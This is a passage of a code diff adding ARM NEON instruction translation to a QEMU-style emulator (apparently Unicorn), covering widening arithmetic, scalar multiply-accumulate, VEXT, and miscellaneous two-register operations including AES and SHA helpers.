TCGV_UNUSED_I32(tmp3); + for (pass = 0; pass < 2; pass++) { + if (src1_wide) { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn + pass); + TCGV_UNUSED_I32(tmp); + } else { + if (pass == 1 && rd == rn) { + tmp = neon_load_scratch(tcg_ctx, 2); + } else { + tmp = neon_load_reg(tcg_ctx, rn, pass); + } + if (prewiden) { + gen_neon_widen(s, tcg_ctx->cpu_V0, tmp, size, u); + } + } + if (src2_wide) { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm + pass); + TCGV_UNUSED_I32(tmp2); + } else { + if (pass == 1 && rd == rm) { + tmp2 = neon_load_scratch(tcg_ctx, 2); + } else { + tmp2 = neon_load_reg(tcg_ctx, rm, pass); + } + if (prewiden) { + gen_neon_widen(s, tcg_ctx->cpu_V1, tmp2, size, u); + } + } + switch (op) { + case 0: case 1: case 4: /* VADDL, VADDW, VADDHN, VRADDHN */ + gen_neon_addl(s, size); + break; + case 2: case 3: case 6: /* VSUBL, VSUBW, VSUBHN, VRSUBHN */ + gen_neon_subl(s, size); + break; + case 5: case 7: /* VABAL, VABDL */ + switch ((size << 1) | u) { + case 0: + gen_helper_neon_abdl_s16(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); + break; + case 1: + gen_helper_neon_abdl_u16(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); + break; + case 2: + gen_helper_neon_abdl_s32(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); + break; + case 3: + gen_helper_neon_abdl_u32(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); + break; + case 4: + gen_helper_neon_abdl_s64(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); + break; + case 5: + gen_helper_neon_abdl_u64(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); + break; + default: abort(); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 8: case 9: case 10: case 11: case 12: case 13: + /* VMLAL, VQDMLAL, VMLSL, VQDMLSL, VMULL, VQDMULL */ + gen_neon_mull(s, tcg_ctx->cpu_V0, tmp, tmp2, size, u); + break; + case 14: /* Polynomial VMULL */ + gen_helper_neon_mull_p8(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp); + break; + default: /* 15 is RESERVED: caught earlier */ + abort(); + } + if (op == 13) { + /* VQDMULL */ + gen_neon_addl_saturate(s, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, size); + neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); + } else if (op == 5 || (op >= 8 && op <= 11)) { + /* Accumulate. */ + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rd + pass); + switch (op) { + case 10: /* VMLSL */ + gen_neon_negl(s, tcg_ctx->cpu_V0, size); + /* Fall through */ + case 5: case 8: /* VABAL, VMLAL */ + gen_neon_addl(s, size); + break; + case 9: case 11: /* VQDMLAL, VQDMLSL */ + gen_neon_addl_saturate(s, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, size); + if (op == 11) { + gen_neon_negl(s, tcg_ctx->cpu_V0, size); + } + gen_neon_addl_saturate(s, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1, size); + break; + default: + abort(); + } + neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); + } else if (op == 4 || op == 6) { + /* Narrowing operation. */ + tmp = tcg_temp_new_i32(tcg_ctx); + if (!u) { + switch (size) { + case 0: + gen_helper_neon_narrow_high_u8(tcg_ctx, tmp, tcg_ctx->cpu_V0); + break; + case 1: + gen_helper_neon_narrow_high_u16(tcg_ctx, tmp, tcg_ctx->cpu_V0); + break; + case 2: + tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, 32); + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_V0); + break; + default: abort(); + } + } else { + switch (size) { + case 0: + gen_helper_neon_narrow_round_high_u8(tcg_ctx, tmp, tcg_ctx->cpu_V0); + break; + case 1: + gen_helper_neon_narrow_round_high_u16(tcg_ctx, tmp, tcg_ctx->cpu_V0); + break; + case 2: + tcg_gen_addi_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, 1u << 31); + tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, 32); + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_V0); + break; + default: abort(); + } + } + if (pass == 0) { + tmp3 = tmp; + } else { + neon_store_reg(tcg_ctx, rd, 0, tmp3); + neon_store_reg(tcg_ctx, rd, 1, tmp); + } + } else { + /* Write back the result. */ + neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); + } + } + } else { + /* Two registers and a scalar. NB that for ops of this form + * the ARM ARM labels bit 24 as Q, but it is in our variable + * 'u', not 'q'. + */ + if (size == 0) { + return 1; + } + switch (op) { + case 1: /* Float VMLA scalar */ + case 5: /* Floating point VMLS scalar */ + case 9: /* Floating point VMUL scalar */ + if (size == 1) { + return 1; + } + /* fall through */ + case 0: /* Integer VMLA scalar */ + case 4: /* Integer VMLS scalar */ + case 8: /* Integer VMUL scalar */ + case 12: /* VQDMULH scalar */ + case 13: /* VQRDMULH scalar */ + if (u && ((rd | rn) & 1)) { + return 1; + } + tmp = neon_get_scalar(s, size, rm); + neon_store_scratch(tcg_ctx, 0, tmp); + for (pass = 0; pass < (u ? 4 : 2); pass++) { + tmp = neon_load_scratch(tcg_ctx, 0); + tmp2 = neon_load_reg(tcg_ctx, rn, pass); + if (op == 12) { + if (size == 1) { + gen_helper_neon_qdmulh_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + } else { + gen_helper_neon_qdmulh_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + } + } else if (op == 13) { + if (size == 1) { + gen_helper_neon_qrdmulh_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + } else { + gen_helper_neon_qrdmulh_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + } + } else if (op & 1) { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + gen_helper_vfp_muls(tcg_ctx, tmp, tmp, tmp2, fpstatus); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + } else { + switch (size) { + case 0: gen_helper_neon_mul_u8(tcg_ctx, tmp, tmp, tmp2); break; + case 1: gen_helper_neon_mul_u16(tcg_ctx, tmp, tmp, tmp2); break; + case 2: tcg_gen_mul_i32(tcg_ctx, tmp, tmp, tmp2); break; + default: abort(); + } + } + tcg_temp_free_i32(tcg_ctx, tmp2); + if (op < 8) { + /* Accumulate. */ + tmp2 = neon_load_reg(tcg_ctx, rd, pass); + switch (op) { + case 0: + gen_neon_add(s, size, tmp, tmp2); + break; + case 1: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + gen_helper_vfp_adds(tcg_ctx, tmp, tmp, tmp2, fpstatus); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case 4: + gen_neon_rsb(s, size, tmp, tmp2); + break; + case 5: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + gen_helper_vfp_subs(tcg_ctx, tmp, tmp2, tmp, fpstatus); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + default: + abort(); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + } + neon_store_reg(tcg_ctx, rd, pass, tmp); + } + break; + case 3: /* VQDMLAL scalar */ + case 7: /* VQDMLSL scalar */ + case 11: /* VQDMULL scalar */ + if (u == 1) { + return 1; + } + /* fall through */ + case 2: /* VMLAL sclar */ + case 6: /* VMLSL scalar */ + case 10: /* VMULL scalar */ + if (rd & 1) { + return 1; + } + tmp2 = neon_get_scalar(s, size, rm); + /* We need a copy of tmp2 because gen_neon_mull + * deletes it during pass 0. */ + tmp4 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_mov_i32(tcg_ctx, tmp4, tmp2); + tmp3 = neon_load_reg(tcg_ctx, rn, 1); + + for (pass = 0; pass < 2; pass++) { + if (pass == 0) { + tmp = neon_load_reg(tcg_ctx, rn, 0); + } else { + tmp = tmp3; + tmp2 = tmp4; + } + gen_neon_mull(s, tcg_ctx->cpu_V0, tmp, tmp2, size, u); + if (op != 11) { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rd + pass); + } + switch (op) { + case 6: + gen_neon_negl(s, tcg_ctx->cpu_V0, size); + /* Fall through */ + case 2: + gen_neon_addl(s, size); + break; + case 3: case 7: + gen_neon_addl_saturate(s, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, size); + if (op == 7) { + gen_neon_negl(s, tcg_ctx->cpu_V0, size); + } + gen_neon_addl_saturate(s, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1, size); + break; + case 10: + /* no-op */ + break; + case 11: + gen_neon_addl_saturate(s, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, size); + break; + default: + abort(); + } + neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); + } + + + break; + default: /* 14 and 15 are RESERVED */ + return 1; + } + } + } else { /* size == 3 */ + if (!u) { + /* Extract. */ + imm = (insn >> 8) & 0xf; + + if (imm > 7 && !q) + return 1; + + if (q && ((rd | rn | rm) & 1)) { + return 1; + } + + if (imm == 0) { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn); + if (q) { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rn + 1); + } + } else if (imm == 8) { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn + 1); + if (q) { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm); + } + } else if (q) { + tmp64 = tcg_temp_new_i64(tcg_ctx); + if (imm < 8) { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn); + neon_load_reg64(tcg_ctx, tmp64, rn + 1); + } else { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn + 1); + neon_load_reg64(tcg_ctx, tmp64, rm); + } + tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, (imm & 7) * 8); + tcg_gen_shli_i64(tcg_ctx, tcg_ctx->cpu_V1, tmp64, 64 - ((imm & 7) * 8)); + tcg_gen_or_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + if (imm < 8) { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm); + } else { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm + 1); + imm -= 8; + } + tcg_gen_shli_i64(tcg_ctx, tcg_ctx->cpu_V1, tcg_ctx->cpu_V1, 64 - (imm * 8)); + tcg_gen_shri_i64(tcg_ctx, tmp64, tmp64, imm * 8); + tcg_gen_or_i64(tcg_ctx, tcg_ctx->cpu_V1, tcg_ctx->cpu_V1, tmp64); + tcg_temp_free_i64(tcg_ctx, tmp64); + } else { + /* BUGFIX */ + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn); + tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, imm * 8); + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm); + tcg_gen_shli_i64(tcg_ctx, tcg_ctx->cpu_V1, tcg_ctx->cpu_V1, 64 - (imm * 8)); + tcg_gen_or_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + } + neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd); + if (q) { + neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V1, rd + 1); + } + } else if ((insn & (1 << 11)) == 0) { + /* Two register misc. */ + op = ((insn >> 12) & 0x30) | ((insn >> 7) & 0xf); + size = (insn >> 18) & 3; + /* UNDEF for unknown op values and bad op-size combinations */ + if ((neon_2rm_sizes[op] & (1 << size)) == 0) { + return 1; + } + if ((op != NEON_2RM_VMOVN && op != NEON_2RM_VQMOVN) && + q && ((rm | rd) & 1)) { + return 1; + } + switch (op) { + case NEON_2RM_VREV64: + for (pass = 0; pass < (q ? 2 : 1); pass++) { + tmp = neon_load_reg(tcg_ctx, rm, pass * 2); + tmp2 = neon_load_reg(tcg_ctx, rm, pass * 2 + 1); + switch (size) { + case 0: tcg_gen_bswap32_i32(tcg_ctx, tmp, tmp); break; + case 1: gen_swap_half(s, tmp); break; + case 2: /* no-op */ break; + default: abort(); + } + neon_store_reg(tcg_ctx, rd, pass * 2 + 1, tmp); + if (size == 2) { + neon_store_reg(tcg_ctx, rd, pass * 2, tmp2); + } else { + switch (size) { + case 0: tcg_gen_bswap32_i32(tcg_ctx, tmp2, tmp2); break; + case 1: gen_swap_half(s, tmp2); break; + default: abort(); + } + neon_store_reg(tcg_ctx, rd, pass * 2, tmp2); + } + } + break; + case NEON_2RM_VPADDL: case NEON_2RM_VPADDL_U: + case NEON_2RM_VPADAL: case NEON_2RM_VPADAL_U: + for (pass = 0; pass < q + 1; pass++) { + tmp = neon_load_reg(tcg_ctx, rm, pass * 2); + gen_neon_widen(s, tcg_ctx->cpu_V0, tmp, size, op & 1); + tmp = neon_load_reg(tcg_ctx, rm, pass * 2 + 1); + gen_neon_widen(s, tcg_ctx->cpu_V1, tmp, size, op & 1); + switch (size) { + case 0: gen_helper_neon_paddl_u16(tcg_ctx, CPU_V001); break; + case 1: gen_helper_neon_paddl_u32(tcg_ctx, CPU_V001); break; + case 2: tcg_gen_add_i64(tcg_ctx, CPU_V001); break; + default: abort(); + } + if (op >= NEON_2RM_VPADAL) { + /* Accumulate. */ + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rd + pass); + gen_neon_addl(s, size); + } + neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); + } + break; + case NEON_2RM_VTRN: + if (size == 2) { + int n; + for (n = 0; n < (q ? 4 : 2); n += 2) { + tmp = neon_load_reg(tcg_ctx, rm, n); + tmp2 = neon_load_reg(tcg_ctx, rd, n + 1); + neon_store_reg(tcg_ctx, rm, n, tmp2); + neon_store_reg(tcg_ctx, rd, n + 1, tmp); + } + } else { + goto elementwise; + } + break; + case NEON_2RM_VUZP: + if (gen_neon_unzip(tcg_ctx, rd, rm, size, q)) { + return 1; + } + break; + case NEON_2RM_VZIP: + if (gen_neon_zip(tcg_ctx, rd, rm, size, q)) { + return 1; + } + break; + case NEON_2RM_VMOVN: case NEON_2RM_VQMOVN: + /* also VQMOVUN; op field and mnemonics don't line up */ + if (rm & 1) { + return 1; + } + TCGV_UNUSED_I32(tmp2); + for (pass = 0; pass < 2; pass++) { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rm + pass); + tmp = tcg_temp_new_i32(tcg_ctx); + gen_neon_narrow_op(s, op == NEON_2RM_VMOVN, q, size, + tmp, tcg_ctx->cpu_V0); + if (pass == 0) { + tmp2 = tmp; + } else { + neon_store_reg(tcg_ctx, rd, 0, tmp2); + neon_store_reg(tcg_ctx, rd, 1, tmp); + } + } + break; + case NEON_2RM_VSHLL: + if (q || (rd & 1)) { + return 1; + } + tmp = neon_load_reg(tcg_ctx, rm, 0); + tmp2 = neon_load_reg(tcg_ctx, rm, 1); + for (pass = 0; pass < 2; pass++) { + if (pass == 1) + tmp = tmp2; + gen_neon_widen(s, tcg_ctx->cpu_V0, tmp, size, 1); + tcg_gen_shli_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, 8 << size); + neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); + } + break; + case NEON_2RM_VCVT_F16_F32: + if (!arm_dc_feature(s, ARM_FEATURE_VFP_FP16) || + q || (rm & 1)) { + return 1; + } + tmp = tcg_temp_new_i32(tcg_ctx); + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ld_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, neon_reg_offset(rm, 0)); + gen_helper_neon_fcvt_f32_to_f16(tcg_ctx, tmp, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env); + tcg_gen_ld_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, neon_reg_offset(rm, 1)); + gen_helper_neon_fcvt_f32_to_f16(tcg_ctx, tmp2, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env); + tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 16); + tcg_gen_or_i32(tcg_ctx, tmp2, tmp2, tmp); + tcg_gen_ld_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, neon_reg_offset(rm, 2)); + gen_helper_neon_fcvt_f32_to_f16(tcg_ctx, tmp, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env); + tcg_gen_ld_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, neon_reg_offset(rm, 3)); + neon_store_reg(tcg_ctx, rd, 0, tmp2); + tmp2 = tcg_temp_new_i32(tcg_ctx); + gen_helper_neon_fcvt_f32_to_f16(tcg_ctx, tmp2, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env); + tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 16); + tcg_gen_or_i32(tcg_ctx, tmp2, tmp2, tmp); + neon_store_reg(tcg_ctx, rd, 1, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case NEON_2RM_VCVT_F32_F16: + if (!arm_dc_feature(s, ARM_FEATURE_VFP_FP16) || + q || (rd & 1)) { + return 1; + } + tmp3 = tcg_temp_new_i32(tcg_ctx); + tmp = neon_load_reg(tcg_ctx, rm, 0); + tmp2 = neon_load_reg(tcg_ctx, rm, 1); + tcg_gen_ext16u_i32(tcg_ctx, tmp3, tmp); + gen_helper_neon_fcvt_f16_to_f32(tcg_ctx, tcg_ctx->cpu_F0s, tmp3, tcg_ctx->cpu_env); + tcg_gen_st_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, neon_reg_offset(rd, 0)); + tcg_gen_shri_i32(tcg_ctx, tmp3, tmp, 16); + gen_helper_neon_fcvt_f16_to_f32(tcg_ctx, tcg_ctx->cpu_F0s, tmp3, tcg_ctx->cpu_env); + tcg_gen_st_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, neon_reg_offset(rd, 1)); + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_gen_ext16u_i32(tcg_ctx, tmp3, tmp2); + gen_helper_neon_fcvt_f16_to_f32(tcg_ctx, tcg_ctx->cpu_F0s, tmp3, tcg_ctx->cpu_env); + tcg_gen_st_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, neon_reg_offset(rd, 2)); + tcg_gen_shri_i32(tcg_ctx, tmp3, tmp2, 16); + gen_helper_neon_fcvt_f16_to_f32(tcg_ctx, tcg_ctx->cpu_F0s, tmp3, tcg_ctx->cpu_env); + tcg_gen_st_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, neon_reg_offset(rd, 3)); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp3); + break; + case NEON_2RM_AESE: case NEON_2RM_AESMC: + if (!arm_dc_feature(s, ARM_FEATURE_V8_AES) + || ((rm | rd) & 1)) { + return 1; + } + tmp = tcg_const_i32(tcg_ctx, rd); + tmp2 = tcg_const_i32(tcg_ctx, rm); + + /* Bit 6 is the lowest opcode bit; it distinguishes between + * encryption (AESE/AESMC) and decryption (AESD/AESIMC) + */ + tmp3 = tcg_const_i32(tcg_ctx, extract32(insn, 6, 1)); + + if (op == NEON_2RM_AESE) { + gen_helper_crypto_aese(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2, tmp3); + } else { + gen_helper_crypto_aesmc(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2, tmp3); + } + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp3); + break; + case NEON_2RM_SHA1H: + if (!arm_dc_feature(s, ARM_FEATURE_V8_SHA1) + || ((rm | rd) & 1)) { + return 1; + } + tmp = tcg_const_i32(tcg_ctx, rd); + tmp2 = tcg_const_i32(tcg_ctx, rm); + + gen_helper_crypto_sha1h(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2); + + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, tmp2); + break; + case NEON_2RM_SHA1SU1: + if ((rm | rd) & 1) { + return 1; + } + /* bit 6 (q): set -> SHA256SU0, cleared -> SHA1SU1 */ + if (q) { + if (!arm_dc_feature(s, ARM_FEATURE_V8_SHA256)) { + return 1; + } + } else if (!arm_dc_feature(s, ARM_FEATURE_V8_SHA1)) { + return 1; + } + tmp = tcg_const_i32(tcg_ctx, rd); + tmp2 = tcg_const_i32(tcg_ctx, rm); + if (q) { + gen_helper_crypto_sha256su0(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2); + } else { + gen_helper_crypto_sha1su1(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2); + } + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, tmp2); + break; + default: + elementwise: + for (pass = 0; pass < (q ? 4 : 2); pass++) { + if (neon_2rm_is_float_op(op)) { + tcg_gen_ld_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, + neon_reg_offset(rm, pass)); + TCGV_UNUSED_I32(tmp); + } else { + tmp = neon_load_reg(tcg_ctx, rm, pass); + } + switch (op) { + case NEON_2RM_VREV32: + switch (size) { + case 0: tcg_gen_bswap32_i32(tcg_ctx, tmp, tmp); break; + case 1: gen_swap_half(s, tmp); break; + default: abort(); + } + break; + case NEON_2RM_VREV16: + gen_rev16(s, tmp); + break; + case NEON_2RM_VCLS: + switch (size) { + case 0: gen_helper_neon_cls_s8(tcg_ctx, tmp, tmp); break; + case 1: gen_helper_neon_cls_s16(tcg_ctx, tmp, tmp); break; + case 2: gen_helper_neon_cls_s32(tcg_ctx, tmp, tmp); break; + default: abort(); + } + break; + case NEON_2RM_VCLZ: + switch (size) { + case 0: gen_helper_neon_clz_u8(tcg_ctx, tmp, tmp); break; + case 1: gen_helper_neon_clz_u16(tcg_ctx, tmp, tmp); break; + case 2: gen_helper_clz(tcg_ctx, tmp, tmp); break; + default: abort(); + } + break; + case NEON_2RM_VCNT: + gen_helper_neon_cnt_u8(tcg_ctx, tmp, tmp); + break; + case NEON_2RM_VMVN: + tcg_gen_not_i32(tcg_ctx, tmp, tmp); + break; + case NEON_2RM_VQABS: + switch (size) { + case 0: + gen_helper_neon_qabs_s8(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); + break; + case 1: + gen_helper_neon_qabs_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); + break; + case 2: + gen_helper_neon_qabs_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); + break; + default: abort(); + } + break; + case NEON_2RM_VQNEG: + switch (size) { + case 0: + gen_helper_neon_qneg_s8(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); + break; + case 1: + gen_helper_neon_qneg_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); + break; + case 2: + gen_helper_neon_qneg_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); + break; + default: abort(); + } + break; + case NEON_2RM_VCGT0: case NEON_2RM_VCLE0: + tmp2 = tcg_const_i32(tcg_ctx, 0); + switch(size) { + case 0: gen_helper_neon_cgt_s8(tcg_ctx, tmp, tmp, tmp2); break; + case 1: gen_helper_neon_cgt_s16(tcg_ctx, tmp, tmp, tmp2); break; + case 2: gen_helper_neon_cgt_s32(tcg_ctx, tmp, tmp, tmp2); break; + default: abort(); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + if (op == NEON_2RM_VCLE0) { + tcg_gen_not_i32(tcg_ctx, tmp, tmp); + } + break; + case NEON_2RM_VCGE0: case NEON_2RM_VCLT0: + tmp2 = tcg_const_i32(tcg_ctx, 0); + switch(size) { + case 0: gen_helper_neon_cge_s8(tcg_ctx, tmp, tmp, tmp2); break; + case 1: gen_helper_neon_cge_s16(tcg_ctx, tmp, tmp, tmp2); break; + case 2: gen_helper_neon_cge_s32(tcg_ctx, tmp, tmp, tmp2); break; + default: abort(); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + if (op == NEON_2RM_VCLT0) { + tcg_gen_not_i32(tcg_ctx, tmp, tmp); + } + break; + case NEON_2RM_VCEQ0: + tmp2 = tcg_const_i32(tcg_ctx, 0); + switch(size) { + case 0: gen_helper_neon_ceq_u8(tcg_ctx, tmp, tmp, tmp2); break; + case 1: gen_helper_neon_ceq_u16(tcg_ctx, tmp, tmp, tmp2); break; + case 2: gen_helper_neon_ceq_u32(tcg_ctx, tmp, tmp, tmp2); break; + default: abort(); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + break; + case NEON_2RM_VABS: + switch(size) { + case 0: gen_helper_neon_abs_s8(tcg_ctx, tmp, tmp); break; + case 1: gen_helper_neon_abs_s16(tcg_ctx, tmp, tmp); break; + case 2: tcg_gen_abs_i32(s, tmp, tmp); break; + default: abort(); + } + break; + case NEON_2RM_VNEG: + tmp2 = tcg_const_i32(tcg_ctx, 0); + gen_neon_rsb(s, size, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + break; + case NEON_2RM_VCGT0_F: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + tmp2 = tcg_const_i32(tcg_ctx, 0); + gen_helper_neon_cgt_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_2RM_VCGE0_F: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + tmp2 = tcg_const_i32(tcg_ctx, 0); + gen_helper_neon_cge_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_2RM_VCEQ0_F: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + tmp2 = tcg_const_i32(tcg_ctx, 0); + gen_helper_neon_ceq_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_2RM_VCLE0_F: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + tmp2 = tcg_const_i32(tcg_ctx, 0); + gen_helper_neon_cge_f32(tcg_ctx, tmp, tmp2, tmp, fpstatus); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_2RM_VCLT0_F: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + tmp2 = tcg_const_i32(tcg_ctx, 0); + gen_helper_neon_cgt_f32(tcg_ctx, tmp, tmp2, tmp, fpstatus); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_2RM_VABS_F: + gen_vfp_abs(s, 0); + break; + case NEON_2RM_VNEG_F: + gen_vfp_neg(s, 0); + break; + case NEON_2RM_VSWP: + tmp2 = neon_load_reg(tcg_ctx, rd, pass); + neon_store_reg(tcg_ctx, rm, pass, tmp2); + break; + case NEON_2RM_VTRN: + tmp2 = neon_load_reg(tcg_ctx, rd, pass); + switch (size) { + case 0: gen_neon_trn_u8(tcg_ctx, tmp, tmp2); break; + case 1: gen_neon_trn_u16(tcg_ctx, tmp, tmp2); break; + default: abort(); + } + neon_store_reg(tcg_ctx, rm, pass, tmp2); + break; + case NEON_2RM_VRINTN: + case NEON_2RM_VRINTA: + case NEON_2RM_VRINTM: + case NEON_2RM_VRINTP: + case NEON_2RM_VRINTZ: + { + TCGv_i32 tcg_rmode; + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + int rmode; + + if (op == NEON_2RM_VRINTZ) { + rmode = FPROUNDING_ZERO; + } else { + rmode = fp_decode_rm[((op & 0x6) >> 1) ^ 1]; + } + + tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rmode)); + gen_helper_set_neon_rmode(tcg_ctx, tcg_rmode, tcg_rmode, + tcg_ctx->cpu_env); + gen_helper_rints(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, fpstatus); + gen_helper_set_neon_rmode(tcg_ctx, tcg_rmode, tcg_rmode, + tcg_ctx->cpu_env); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + tcg_temp_free_i32(tcg_ctx, tcg_rmode); + break; + } + case NEON_2RM_VRINTX: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + gen_helper_rints_exact(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, fpstatus); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_2RM_VCVTAU: + case NEON_2RM_VCVTAS: + case NEON_2RM_VCVTNU: + case NEON_2RM_VCVTNS: + case NEON_2RM_VCVTPU: + case NEON_2RM_VCVTPS: + case NEON_2RM_VCVTMU: + case NEON_2RM_VCVTMS: + { + bool is_signed = 